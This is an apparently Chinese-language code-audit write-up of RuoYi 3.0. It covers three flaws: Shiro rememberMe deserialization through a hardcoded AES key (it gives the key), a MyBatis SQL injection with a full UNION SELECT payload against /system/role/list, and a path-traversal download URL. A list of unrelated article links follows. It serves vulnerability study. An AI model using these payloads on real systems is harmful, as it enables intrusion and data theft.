【代码审计】RuoYi-3.0 三处安全问题分析

目录

Shiro反序列化

SQL注入

任意文件下载


Shiro反序列化

看到pom.xml里有1.4.0的Shiro依赖

可以打Shiro反序列化

Shiro Remember Me 的生成机制,就是把用户信息序列化成字节,然后用AES加密,最后Base64编码,放到Cookie里。

详细拆解三步:

  1. 序列化: 将用户的登录信息(如用户名)通过 Java原生序列化 变成二进制字节流。

  2. 加密: 使用 AES-128-CBC 模式,配合一个 硬编码的默认密钥 (如 kPH+bIxk5D2deZiIxcaaaA==)对这个字节流进行加密。

  3. 编码: 将加密后的字节进行 Base64编码 ,最终得到 rememberMe Cookie的值。

硬编码了密钥,拿到密钥后即可用任意恶意序列化数据进行Remember Me字段构造

复制代码
fCq+/xW488hMTCD+cmJ3aQ==

直接一把梭了

SQL注入

Ruoyi操作数据库用的是MyBatis

全局搜${

${params.dataScope}可以被注入

全局搜selectRoleList

发现最终是被/system/role/list去调用

顾名思义这个接口功能点在这

params是个数组

我们可以这样传参

复制代码
roleName=111&roleKey=111&status=&params[beginTime]=&params[endTime]=&params[dataScope]=and 1=2
union select 1,2,3,4,5,6,7,concat(0x7e,(select database()),0x7e),9&pageSize=10&pageNum=1&orderByColumn=roleSort&isAsc=asc

成功查询到数据库名为ry

任意文件下载

全局搜/download

逻辑很简单,就是接收一个可控的filename参数,然后对返回的文件名做一些随机化处理

将指定文件内容返回回来

payload:

复制代码
/common/download?filename=../../../../../../flag.txt
相关推荐
木头科技几秒前
【AI 工程化第八篇】Spring AI 多模型路由实战:DeepSeek、通义、Kimi、OpenAI 如何统一接入和自动切换
java·人工智能·spring
深盾科技_Virbox3 分钟前
云端与本地并行交付,软件许可管理如何实现统一运营?
java·大数据·开发语言·安全
thefool1122664 分钟前
多线程 3
java
CoderYanger10 分钟前
A.每日一题:856. 括号的分数
java·程序人生·算法·leetcode·面试·职场和发展·学习方法
liangbo727 分钟前
01-Java 集合框架全景:从 Collection 到 Map 一张关系网理清
java
xuxigifxfh30 分钟前
HJ15 求int型正整数在内存中存储时1的个数
java·开发语言·华为机考
Wokoo734 分钟前
自动化测试入门:核心场景、回归测试与 Web 自动化环境搭建
java·开发语言·测试工具
我是人✓1 小时前
Spring IOC注解全解析和Spring整合测试单元
java·后端·spring
智购科技无人售货机工厂店1 小时前
玻璃瓶饮料破损率突然上升,排查发现是取货口缓冲垫老化了~YH
java·开发语言·人工智能·python·eclipse
镜象科技1 小时前
中小学AI心理健康解决方案服务商怎么选?2026年选型参考
android·java·人工智能